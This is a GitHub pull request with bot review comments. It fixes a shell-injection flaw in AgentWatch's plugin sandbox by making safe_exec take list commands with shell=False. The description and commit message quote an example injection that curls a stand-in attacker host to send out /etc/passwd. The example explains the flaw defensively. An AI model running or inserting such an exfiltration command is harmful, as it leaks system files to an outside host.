fix(plugins): implement PermissionEnforcer.safe_exec with shell=False to prevent injection by anshul23102 · Pull Request #110 · sreerevanth/AgentWatch

anshul23102 · 2026-05-30T12:31:36Z

Description

PermissionEnforcer.safe_exec passed plugin-supplied command strings to subprocess.run with shell=True. This caused /bin/sh to interpret shell metacharacters in the command string (semicolons, pipes, backticks, $(...), redirects). A plugin with subprocess_exec permission could supply "ls; curl http://attacker.com/exfil?d=$(cat /etc/passwd|base64)" and both commands would execute, bypassing the intended single-command boundary.

Related Issue

Closes #97

Type of Change

Bug fix (security)

Root Cause

subprocess.run(cmd, shell=True) invokes /bin/sh -c cmd, which interprets all shell metacharacters in the command string. The permission check only verified that subprocess_exec was granted; it did not sanitize or tokenize the input.

Changes Made

File	Change
`agentwatch/plugins/sandbox.py`	Implemented full `PermissionEnforcer` class in the sandbox module stub
`agentwatch/plugins/sandbox.py`	`safe_exec` now requires `cmd: list[str]` and uses `subprocess.run(cmd, shell=False)`. The OS exec family receives arguments directly from the list, so no shell interprets metacharacters
`agentwatch/plugins/sandbox.py`	Added `ValueError` guard for non-list or empty `cmd`
`agentwatch/plugins/sandbox.py`	Added `safe_open()` for permission-enforced filesystem access

Screenshots or Demo

Not applicable (no UI change).

Testing Done

Tests are in tests/test_sandbox.py (added in PR #111 for issue #98). Key tests for this fix:

test_safe_exec_requires_list: non-list input raises ValueError
test_safe_exec_without_permission_raises: call without subprocess_exec raises SandboxViolationError
test_safe_exec_with_permission_runs: valid list command executes correctly
test_safe_exec_shell_metacharacters_not_interpreted: ["echo", "safe; echo injected"] outputs the literal semicolon, not two commands

Run: pytest tests/test_sandbox.py -v

Checklist

I have read the CONTRIBUTING.md and followed its guidelines
My code follows the style and formatting of this project
I have tested my changes locally and they work as expected
There are no merge conflicts with the base branch
All CI checks are passing
This PR is linked to the correct issue
I have not used any AI-generated content in this PR

NSSoC Label Request

@sreerevanth could you please add the appropriate NSoC 26' label to this PR? It helps with tracking and scoring under NSoC '26. Thank you!

Summary by CodeRabbit

New Features
- Plugins now have enforced runtime permissions for filesystem access (read/write operations) and subprocess execution based on declared permissions
- Unauthorized operations are blocked and tracked with detailed violation reports for troubleshooting

…t injection safe_exec previously called subprocess.run(cmd, shell=True) where cmd was a caller-supplied string. shell=True causes /bin/sh to interpret the string, so any shell metacharacter (semicolon, pipe, backtick, dollar, redirect) in cmd would be executed as a shell command. A plugin with subprocess_exec permission could supply: safe_exec('ls; curl http://attacker.com/$(cat /etc/passwd | base64)') and both commands would execute. Fix: safe_exec now requires cmd to be a list[str] and passes it to subprocess.run with shell=False. The OS exec family handles argument splitting directly from the list, so no shell interprets metacharacters. A ValueError is raised immediately when a non-list or empty cmd is given. Also implements the full PermissionEnforcer class in the sandbox module stub, including safe_open() for filesystem permission enforcement. Closes sreerevanth#97

coderabbitai · 2026-05-30T12:31:46Z

📝 Walkthrough

Walkthrough

New sandbox.py module establishes runtime permission enforcement for plugins. SandboxViolationError signals denials. PermissionEnforcer wraps filesystem access and subprocess execution, validating operations against a PluginManifest, recording attempts, and using list-based commands with shell=False to prevent shell injection.

Changes

Plugin Sandbox Permission Enforcement

Layer / File(s)	Summary
Sandbox foundation and exception `agentwatch/plugins/sandbox.py`	Module docstring, imports (logging, PluginManifest, typing), and `SandboxViolationError` exception class for permission violations.
PermissionEnforcer initialization and validation `agentwatch/plugins/sandbox.py`	`PermissionEnforcer.__init__` stores manifest and initializes tracking lists. Internal `_check(permission, context)` helper validates permissions via `getattr`, records attempted resource contexts, and raises `SandboxViolationError` when operation is disallowed.
Sandboxed file and subprocess operations `agentwatch/plugins/sandbox.py`	`safe_open(path, mode)` determines read vs write intent from mode string and enforces `filesystem_read` or `filesystem_write` permission before delegating to builtin `open`. `safe_exec(cmd)` requires `cmd` as non-empty `list[str]`, enforces `subprocess_exec` permission, imports `subprocess`, and executes with `subprocess.run(..., shell=False, ...)` to prevent shell metacharacter injection.
Violation and resource tracking APIs `agentwatch/plugins/sandbox.py`	`violations` and `accessed_resources` read-only properties return copies of internally tracked lists of denied and allowed resource access attempts.

Estimated Code Review Effort

🎯 2 (Simple) | ⏱️ ~12 minutes

Poem

🐰 A sandbox walls each plugin tight,
With permissions guarded, day and night,
No shell injection sneaks through here—
Commands as lists stay crystal clear!
Safe filesystems, subprocess runs so clean,
The finest permission guard you've seen! ✨

🚥 Pre-merge checks | ✅ 4 | ❌ 1

❌ Failed checks (1 warning)

Check name	Status	Explanation	Resolution
Docstring Coverage	⚠️ Warning	Docstring coverage is 33.33% which is insufficient. The required threshold is 80.00%.	Write docstrings for the functions missing them to satisfy the coverage threshold.

✅ Passed checks (4 passed)

Check name	Status	Explanation
Description Check	✅ Passed	Check skipped - CodeRabbit’s high-level summary is enabled.
Title check	✅ Passed	The title directly addresses the main security fix: implementing safe_exec with shell=False to prevent shell injection attacks.
Linked Issues check	✅ Passed	The PR fully implements the security fix required by issue `#97`: safe_exec now accepts list[str], calls subprocess.run with shell=False, validates non-empty list, and safe_open enforces filesystem permissions.
Out of Scope Changes check	✅ Passed	All changes are scoped to implementing the PermissionEnforcer class with shell injection prevention and filesystem access controls, directly addressing issue `#97` requirements.

_{✏️ Tip: You can configure your own custom pre-merge checks in the settings.}

✨ Finishing Touches

🧪 Generate unit tests (beta)

Create PR with unit tests

_{Comment @coderabbitai help to get the list of available commands and usage tips.}

coderabbitai

Actionable comments posted: 2

🤖 Prompt for all review comments with AI agents

Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In `@agentwatch/plugins/sandbox.py`:
- Around line 67-68: The current guard only ensures cmd is a non-empty list but
doesn't validate element types; update the validation in the function that
accepts the cmd parameter so that it checks every element is an instance of str
(and still ensure the list is non-empty), and if any element is not a string
raise a ValueError with a clear message (e.g., "cmd must be a non-empty list of
strings"); locate and change the conditional that currently reads "if not
isinstance(cmd, list) or not cmd:" to iterate/check all entries of cmd before
proceeding.
- Around line 29-33: PermissionEnforcer.__init__ currently stores
manifest.permissions by reference which allows later mutations to change sandbox
policy; snapshot the boolean permission values (e.g., create a new dict or
dataclass copying fields from manifest.permissions into self._perms) inside
PermissionEnforcer.__init__ instead of assigning manifest.permissions directly.
Also tighten safe_exec: before calling _check or subprocess.run, validate that
cmd is a non-empty list and that every element is an instance of str (raise a
clear error or record a violation if any element is non-str) so the advertised
cmd: list[str] contract is enforced; update references in safe_exec to use the
validated/casted cmd when invoking _check and subprocess.run.

🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

Push a commit to this branch (recommended)
Create a new PR with the fixes

ℹ️ Review info

⚙️ Run configuration

Configuration used: Organization UI

Review profile: CHILL

Plan: Pro Plus

Run ID: 33e30ac2-9538-4e64-b5a3-cb3c032423f6

📥 Commits

Reviewing files that changed from the base of the PR and between 55545f0 and 0e781d6.

📒 Files selected for processing (1)

agentwatch/plugins/sandbox.py

coderabbitai · 2026-05-30T12:36:43Z

+    def __init__(self, manifest: PluginManifest) -> None:
+        self._perms = manifest.permissions
+        self._plugin_id = manifest.plugin_id
+        self._violations: list[str] = []
+        self._accessed: list[str] = []


🛠️ Refactor suggestion | 🟠 Major | ⚡ Quick win

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash set -euo pipefail echo "Locate PluginManifest and permissions-related definitions" rg -n -C3 --type=py '\bclass\s+PluginManifest\b|\bclass\s+\w*Permissions\b|\bpermissions\s*:' agentwatch echo echo "Check for immutability/frozen model configuration" rg -n -C3 --type=py 'model_config\s*=|ConfigDict$|allow_mutation\s*=|frozen\s*=|class\s+Config\b' agentwatch

Repository: sreerevanth/AgentWatch

Length of output: 2157

🏁 Script executed:

#!/bin/bash set -euo pipefail echo "Search for Pydantic immutability settings in agentwatch" rg -n --type=py 'model_config\s*=|ConfigDict\s*\(|allow_mutation\s*=|frozen\s*=\s*True' agentwatch echo echo "Inspect PluginPermissions / PluginManifest definitions for any config" rg -n --type=py 'class\s+PluginPermissions|class\s+PluginManifest' agentwatch/core/schema.py

Repository: sreerevanth/AgentWatch

Length of output: 122

🏁 Script executed:

#!/bin/bash set -euo pipefail echo "Show PluginPermissions / PluginManifest definitions" nl -ba agentwatch/core/schema.py | sed -n '380,480p' echo echo "Find BaseModel definition / custom base class (if any)" rg -n --type=py 'class\s+\w*\(BaseModel$|from\s+pydantic\s+import\s+BaseModel|BaseModel' agentwatch/core/schema.py agentwatch/core -S

Repository: sreerevanth/AgentWatch

Length of output: 179

🏁 Script executed:

#!/bin/bash set -euo pipefail echo "Show PluginPermissions / PluginManifest definitions (approx. lines 410-460)" sed -n '400,470p' agentwatch/core/schema.py echo echo "Find BaseModel definition / custom base class (search wider for pydantic model base/config)" rg -n --type=py 'from\s+pydantic\s+import\s+BaseModel|class\s+\w+$BaseModel$|ConfigDict|model_config' agentwatch/core/schema.py agentwatch/core -S

Repository: sreerevanth/AgentWatch

Length of output: 3587

🏁 Script executed:

#!/bin/bash set -euo pipefail echo "Inspect agentwatch/plugins/sandbox.py around PermissionEnforcer.__init__/safe_exec" sed -n '1,220p' agentwatch/plugins/sandbox.py echo echo "Find where PermissionEnforcer is constructed" rg -n --type=py 'PermissionEnforcer\s*\(' agentwatch echo echo "Search for mutations/access of manifest.permissions / PluginPermissions attributes" rg -n --type=py '\bmanifest\.permissions\b' agentwatch rg -n --type=py 'permissions\.(filesystem_read|filesystem_write|network_outbound|network_inbound|subprocess_exec|credential_access|memory_read|memory_write)\s*=' agentwatch

Repository: sreerevanth/AgentWatch

Length of output: 3008

🏁 Script executed:

#!/bin/bash set -euo pipefail echo "Find where PermissionEnforcer is constructed" rg -n --type=py 'PermissionEnforcer\s*\(' agentwatch || true echo echo "Search for reads/mutations of manifest.permissions / PluginPermissions attributes" rg -n --type=py '\bmanifest\.permissions\b' agentwatch || true rg -n --type=py '\bmanifest\.permissions\s*=' agentwatch || true rg -n --type=py 'permissions\.(filesystem_read|filesystem_write|network_outbound|network_inbound|subprocess_exec|credential_access|memory_read|memory_write)\s*=' agentwatch || true echo echo "Search for accessing PluginManifest.permissions attributes directly" rg -n --type=py '\.permissions\.' agentwatch || true

Repository: sreerevanth/AgentWatch

Length of output: 339

🏁 Script executed:

#!/bin/bash set -euo pipefail echo "Find call sites of safe_exec" rg -n --type=py '\.safe_exec\s*\(' agentwatch echo echo "Find call sites of safe_open" rg -n --type=py '\.safe_open\s*\(' agentwatch echo echo "Look for PermissionEnforcer construction usage" rg -n --type=py 'PermissionEnforcer\s*\(' agentwatch

Repository: sreerevanth/AgentWatch

Length of output: 95

🏁 Script executed:

#!/bin/bash set -euo pipefail echo "Search for any mention of 'safe_exec' or 'safe_open' in repo" rg -n --type=py 'safe_exec|safe_open' agentwatch || true echo echo "Search for getattr/setattr using sandbox methods" rg -n --type=py 'getattr\s*\(\s*.*,\s*["'\'']safe_(exec|open)["'\'']' agentwatch || true rg -n --type=py 'safe_(exec|open)\s*['\''"]' agentwatch || true echo echo "Search for PermissionEnforcer usage without assuming direct constructor call" rg -n --type=py 'PermissionEnforcer' agentwatch || true

Repository: sreerevanth/AgentWatch

Length of output: 614

Snapshot permissions in PermissionEnforcer.init and enforce list[str] elements in safe_exec.

PermissionEnforcer.__init__ stores manifest.permissions by reference; PluginPermissions/PluginManifest are mutable pydantic.BaseModel classes (no frozen/immutability config found), so later mutations can change the sandbox policy—copy/snapshot the permission booleans instead.

safe_exec only checks that cmd is a non-empty list; it doesn’t validate that every element is a str, so it doesn’t actually enforce the advertised cmd: list[str] contract—validate element types before calling _check/subprocess.run.

🤖 Prompt for AI Agents

Verify each finding against current code. Fix only still-valid issues, skip the rest with a brief reason, keep changes minimal, and validate. In `@agentwatch/plugins/sandbox.py` around lines 29 - 33, PermissionEnforcer.__init__ currently stores manifest.permissions by reference which allows later mutations to change sandbox policy; snapshot the boolean permission values (e.g., create a new dict or dataclass copying fields from manifest.permissions into self._perms) inside PermissionEnforcer.__init__ instead of assigning manifest.permissions directly. Also tighten safe_exec: before calling _check or subprocess.run, validate that cmd is a non-empty list and that every element is an instance of str (raise a clear error or record a violation if any element is non-str) so the advertised cmd: list[str] contract is enforced; update references in safe_exec to use the validated/casted cmd when invoking _check and subprocess.run.

coderabbitai · 2026-05-30T12:36:43Z

+        if not isinstance(cmd, list) or not cmd:
+            raise ValueError("cmd must be a non-empty list of strings")


⚠️ Potential issue | 🟡 Minor | ⚡ Quick win

Validate every cmd element is a string.

The method is declared as cmd: list[str], but the guard only enforces “non-empty list”. Non-string entries still pass validation and fail deeper in the call stack instead of at the API boundary.

Proposed fix

- if not isinstance(cmd, list) or not cmd: + if ( + not isinstance(cmd, list) + or not cmd + or any(not isinstance(arg, str) for arg in cmd) + ): raise ValueError("cmd must be a non-empty list of strings")

🤖 Prompt for AI Agents

Verify each finding against current code. Fix only still-valid issues, skip the rest with a brief reason, keep changes minimal, and validate. In `@agentwatch/plugins/sandbox.py` around lines 67 - 68, The current guard only ensures cmd is a non-empty list but doesn't validate element types; update the validation in the function that accepts the cmd parameter so that it checks every element is an instance of str (and still ensure the list is non-empty), and if any element is not a string raise a ValueError with a clear message (e.g., "cmd must be a non-empty list of strings"); locate and change the conditional that currently reads "if not isinstance(cmd, list) or not cmd:" to iterate/check all entries of cmd before proceeding.

anshul23102 mentioned this pull request May 30, 2026

[Security][Level 3] plugins/sandbox.py: PermissionEnforcer.safe_exec uses shell=True, enabling shell injection through metacharacters in plugin-supplied command strings #97

Open

coderabbitai Bot reviewed May 30, 2026

View reviewed changes

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

fix(plugins): implement PermissionEnforcer.safe_exec with shell=False to prevent injection#110

fix(plugins): implement PermissionEnforcer.safe_exec with shell=False to prevent injection#110
anshul23102 wants to merge 1 commit into
sreerevanth:mainfrom
anshul23102:fix/97-sandbox-shell-injection

anshul23102 commented May 30, 2026 •

edited by coderabbitai Bot

Loading

Uh oh!

coderabbitai Bot commented May 30, 2026 •

edited

Loading

Walkthrough

Changes

Estimated Code Review Effort

Poem

❌ Failed checks (1 warning)

Uh oh!

coderabbitai Bot left a comment

Uh oh!

coderabbitai Bot May 30, 2026

Uh oh!

coderabbitai Bot May 30, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

		if not isinstance(cmd, list) or not cmd:
		raise ValueError("cmd must be a non-empty list of strings")

Conversation

anshul23102 commented May 30, 2026 • edited by coderabbitai Bot Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Description

Related Issue

Type of Change

Root Cause

Changes Made

Screenshots or Demo

Testing Done

Checklist

NSSoC Label Request

Summary by CodeRabbit

Uh oh!

coderabbitai Bot commented May 30, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Walkthrough

Changes

Estimated Code Review Effort

Poem

❌ Failed checks (1 warning)

Uh oh!

coderabbitai Bot left a comment

Choose a reason for hiding this comment

Uh oh!

coderabbitai Bot May 30, 2026

Choose a reason for hiding this comment

Uh oh!

coderabbitai Bot May 30, 2026

Choose a reason for hiding this comment

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

anshul23102 commented May 30, 2026 •

edited by coderabbitai Bot

Loading

coderabbitai Bot commented May 30, 2026 •

edited

Loading